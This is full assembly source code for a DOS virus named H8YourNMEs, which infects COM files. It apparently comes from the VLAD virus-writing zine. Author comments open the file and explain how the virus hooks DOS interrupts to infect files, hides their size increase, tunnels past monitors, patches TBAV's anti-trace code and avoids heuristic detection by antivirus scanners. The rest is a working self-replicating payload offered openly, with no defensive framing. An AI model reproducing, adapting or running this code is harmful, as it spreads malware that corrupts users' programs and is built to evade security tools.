; .H8YOurNMEs. Virus by Sepultura
; Before you you have the third virus I have released.
; It is a .CO? infector of COM type files. 1173 bytes long.
; Some may scoff at this virus and its simplicity.
; Admitedly the code is full of rubbish, redundant instructions,
; and poor programing techniques. However life is an ongoing
; learning process. I have written approximately 20 viruses.
; This however is only the third I have released. This is because
; the other 17 or so were once again part of the learninig process
; and were simply programming excersises. Those who scoff can
; wallow in their foolishness and lack of appreciation of
; the pursuit knowledge.
; But now on to the virus.
; This virus infects on ah=4b, ah=6c, ah=3c, ah=3d / int 21
; It therefore is fairly virulent.
; It marks infected files using the typical adding 100 to the
; years field.
; on ah=11, ah=12.ah=4e, ah=4f/ int 21, the virus intercepts
; and restores the original file length and date.
; This is my first size stealthing virus, and was one of my
; two goals in writing this. The size stealthing is _SLIGHTLY_
; different from any other size stealther i have seen before.
; This is because 11,12,4e,4f all share the same handler rather
; then having a seperate one for FCB's and ASCII's. This is also
; slightly smaller.
; When a file starting with 'F-','IV','ND' or ending with 'SK','AV'
; is executed the stealth an infection will be disabled until the
; program terminates.
; It tunnels through int 21 code, but instead of
; using a typical
; cmp seg, wanted_seg / jb found_seg
; it searches for the segment that is terminated with an IRET, and
; returns the entry point of that segment. This is more effective
; when DOS is loaded high.
; The second goal of writing this virus is to write a virus with
; no heuristic flags, which is _NOT_ encrypted. This works
; perfectly with TBAV and (ofcourse) F-PROT, but alas, I still can
; not beat AVP. My regards to the authors for writing one of the
; few _DECENT_ av programs out there.
; The virus will use UMB's if they are available.
; The reason i am not using encryption is because i do not have time
; to write a polymorphic engine, and in my opinion normal encryption
; is effective as _NO_ encryption, because there is still a search
; string. There is nothing else remarkable about this virus.
; It requires the A86 asembler.
; Greets: Qark, M3t4bolis (ill stay awake longer then u on irc 1day =))
; Slash, The Unforgiven, Redback.
; BTW: Sepultura: (Latin) One who is burying, putting in the grave.
radix 16
length equ end - start
mem_length equ ((length + length) / 10) + 1
dta_date equ 18
dta_size equ 1a
hundred equ 0c8
org 100
start: mov W[prefuck0],020cd
prefuck0:jmp $+3
db 080
mov ah,0ff
int 21
mov W[prefuck0],01eb
or ax,ax
jnz not_installed
jmp $+3
db 080
mov ah,0fe
int 21
not_installed:
call site
jmp $+3
db 080
mov ah,13
int 2f
mov cs:orig_13_off,bx
mov cs:orig_13_seg,es
jmp $+3
db 0b8
int 2f
mov ax,3521
int 21
mov cs:prev_21_off,bx
mov cs:prev_21_seg,es
mov ax,3520
int 21
mov cs:int_20_off,bx
mov cs:int_20_seg,es
mov ah,52
int 21
mov ax,es:[bx-2]
mcb_loop:
mov ds,ax
add ax,[3]
inc ax
jmp $+3
db 0c7
cmp byte ptr [0],'Z'
jne mcb_loop
push ds
mov ds,ax
jmp $+3
db 0c7
cmp byte ptr [0],'M'
pop ds
je mcb_loop
mov bx, mem_length
jmp $+3
db 080
sub [3],bx
sub ax,bx
sub ax,10
cmp ax,0a000
ja not_low
jmp $+3
db 080
sub cs:W[2],bx
not_low:mov es,ax
mov di,100
mov si,di
mov cx,length
mov ds,cs
rep movsb
mov ax,2521
int 1
mov ds,es
mov dx,offset int21_handler
int 21
mov ax,2520
mov dx,offset int20_handler
int 21
jmp $+3
db 080
mov ah,0fe
int 21
call_sizer:
popf
call sizer
push cs:W[flags]
popf
retf 2
db '[H8YourNMEs]', 0
db 'SpLr', 0
int21_handler:
pushf
cmp ah,4c
jz is_exit
cmp ah,0
jnz not_exit
is_exit:mov cs:B[in_badprog],0
jmp exit_21f
not_exit:
cmp cs:B[in_badprog],1
jz exit_21f
cmp ah,0fe
je is_return
cmp ah,0ff
je is_resident
cmp ah,04e
je call_sizer
cmp ah,04f
je call_sizer
cmp ah,012
je call_sizer
cmp ah,011
je call_sizer
call push_regs
jmp $+3
db 0c7
cmp ah,04b
je call_inf
cmp ah,03d
je call_inf
cmp ah,03c
je call_inf
cmp ah,6c
jne exit_21
mov dx,si
call_inf:
call inf_file
exit_21:call pop_regs
exit_21f:
popf
db 0ea
prev_21_off dw 0
prev_21_seg dw 0
is_return:
add sp,4
pop ax
mov ds,ax
mov es,ax
mov ss,ax
mov sp,0ffee
mov si,word file_length
mov di,100
add si,di
push ds
push di
mov cx,length
repz movsb
iret
is_resident:
xor ax,ax
popf
iret
inf_file:
mov si,dx
mov cs:[ff_ah],ah
mov ah,'.'
o_next_char:
lodsb
or al,al
jz ret
cmp al,ah
jne o_next_char
mov es,cs
cld
lodsw
or ax,2020
cmp ax,'oc'
jz infector
cmp cs:B[ff_ah],4b
jnz ret
sub si,5
mov di,offset badproge
lodsw
or ax,2020
scasw
jz bad_prog
scasw
jz bad_prog
mov di,offset badprogs
mov cx,4
mov si,dx
lodsw
or ax,2020
cld
chk_start:
scasw
jz bad_prog
loop chk_start
ret
bad_prog:
mov cs:B[in_badprog],1
ret
infector:
mov cs:B[in_badprog],0
sub si,0a
mov es,cs
mov di,offset command_com
mov cx,7
name_test:
lodsb
or al,20
scasb
loope name_test
if e ret
mov cs:file_name_ds,ds
mov ds,cs
mov file_name_dx,dx
mov ax,3503
int 21
mov int_3_seg,es
mov int_3_off,bx
lds dx, site_traced_off
mov ax,2503
int 21
mov ds,cs
mov ax,3524
int 3
mov int_24_seg,es
mov int_24_off,bx
mov dx,offset int24_handler
mov ax,2524
int 3
mov ax,3513
int 3
mov int_13_off,bx
mov int_13_seg,es
lds dx,orig_13_off
mov ax,2513
int 3
mov B[prefuck4],0c3
prefuck4:nop
mov B[prefuck4],90
cs:lds dx,file_name_dx
mov ax,03d02
int 3
if c jmp e_f_nc
xchg bx,ax
mov ax,5700
int 3
mov cs:file_date,dx
mov cs:file_time,cx
cmp dh, hundred
ja exit_infector
mov ax,4300
int 3
cs:mov file_attribs,cx
xor cx,cx
mov ax,4301
int 3
mov cx,length
mov ds,cs
mov dx,offset end
mov ah,03f
int 3
mov es,cs
jmp $+3
db 080
cmp W[end],'ZM'
jz exit_infector
xor cx,cx
cwd
mov ax,4202
int 3
cmp ax,length
jb exit_infector
cmp ax,0feff - length
jnb exit_infector
mov cs:W[file_length],ax
mov ah,40
mov cx,length
mov dx,offset end
int 3
xor cx,cx
cwd
mov ax,4200
int 3
mov ah,40
mov dx,start
mov cx,length
int 3
mov cs:dx,file_date
add dh,hundred
jmp h_added
exit_infector:
mov cs:dx,file_date
h_added:mov ax,5701
mov cs:cx,file_time
int 3
mov ah,03e
int 3
lds cs:dx,file_name_dx
e_f_nc: mov ax,4301
mov cs:cx,file_attribs
int 3
lds cs:dx,int_24_off
mov ax,2524
int 3
lds cs:dx,int_13_off
mov ax,2513
int 3
lds cs:dx,int_3_off
mov ax,2503
int 21
ret
sizer: pushf
mov cs:B[ff_ah],ah
cmp ah,4d
ja ascii
call cs:D[site_traced_off]
pushf
pop cs:W[flags]
call push_regs
or al,al
jnz exit_sizer
mov di,1
jmp ff_same
ascii: call cs:D[site_traced_off]
pushf
pop cs:W[flags]
call push_regs
jc exit_sizer
xor di,di
ff_same:mov ah,2f
int 21
cmp es:B[bx],0ff
if e add di,7
add bx,di
mov ax,es:[bx+dta_date]
cmp ah,hundred
jb exit_sizer
sub ah, hundred
mov es:W[bx+dta_date],ax
cmp cs:B[ff_ah],4c
if b inc bx,2
sub es:W[bx+dta_size],length
sbb es:W[bx+dta_size+2],0
exit_sizer:
call pop_regs
ret
int24_handler:
mov al,0
iret
int20_handler:
mov cs:B[in_badprog],0
db 0ea
int_20_off dw 0
int_20_seg dw 0
site: clc
mov ax,3501
int 21
mov site_int1_seg,es
mov site_int1_off,bx
jmp $+3
db 0
mov ax,2501
mov dx,offset site_iret
int 21
pushf
pushf
pop ax
or ah,01
push ax
popf
xor ax,ax
mov ds,ax
mov ah,52
ds:call far [84]
mov ax,cs
mov ds,ax
mov es,ax
jmp $+3
db 0
mov ax,2501
lds dx,cs:site_int1_off
int 21
cld
sti
and cs:B[tb_patched],1
jz ret
mov cs:B[tb_patched],0
les di,cs:tb_patched_off
mov al,74
stosb
ret
site_iret:
push bp
mov bp,sp
call push_regs
lds si,ss:[bp+2]
mov ax,ds
cmp cs:site_prev_seg,ax
jz site_same_seg
mov cs:site_prev_seg,ds
mov cs:site_prev_off,si
site_same_seg:
cmp B[si],0cf
jz site_is_iret_seg
or byte ptr [bp+07],01
site_exit_int1:
mov cx,0d
mov es,cs
mov di,offset site_anti_trace_sig
repz cmpsb
jnz no_tb
mov byte ptr [si],0eb
mov cs:B[tb_patched],1
mov cs:tb_patched_off,si
mov cs:tb_patched_seg,ds
no_tb: call pop_regs
pop bp
iret
site_is_iret_seg:
lds si,cs:site_prev_off
mov cs:W[site_traced_off],si
mov cs:W[site_traced_seg],ds
and B[bp+07],0fe
jmp site_exit_int1
push_regs:
pop cs:W[seg_ret]
push ax,bx,cx,dx
push si,di,bp
push ds,es
push cs:W[seg_ret]
ret
pop_regs:
pop cs:W[seg_ret]
pop es,ds
pop bp,di,si
pop dx,cx,bx,ax
push cs:W[seg_ret]
ret
site_anti_trace_sig: db 0fa, 09c, 0fc, 053, 050, 093, 058, 04c, 04c, 05b, 03b, 0c3, 05b, 074
badprogs dw 'tx','-f','dn','vi'
badproge dw 'ks','va'
command_com db 'command'
tb_patched db 0
in_badprog db 0
ff_ah db 0
file_length dw length - 2
flags dw 0
seg_ret dw 0
tb_patched_off dw 0
tb_patched_seg dw 0
int_3_off dw 0
int_3_seg dw 0
int_13_off dw 0
int_13_seg dw 0
int_24_off dw 0
int_24_seg dw 0
orig_13_off dw 0
orig_13_seg dw 0
site_int1_off dw 0
site_int1_seg dw 0
site_traced_off dw 0
site_traced_seg dw 0
site_prev_off dw 0
site_prev_seg dw 0
file_name_dx dw 0
file_name_ds dw 0
file_attribs dw 0
file_date dw 0
file_time dw 0
end:
int 20
�- VLAD #5 INDEX -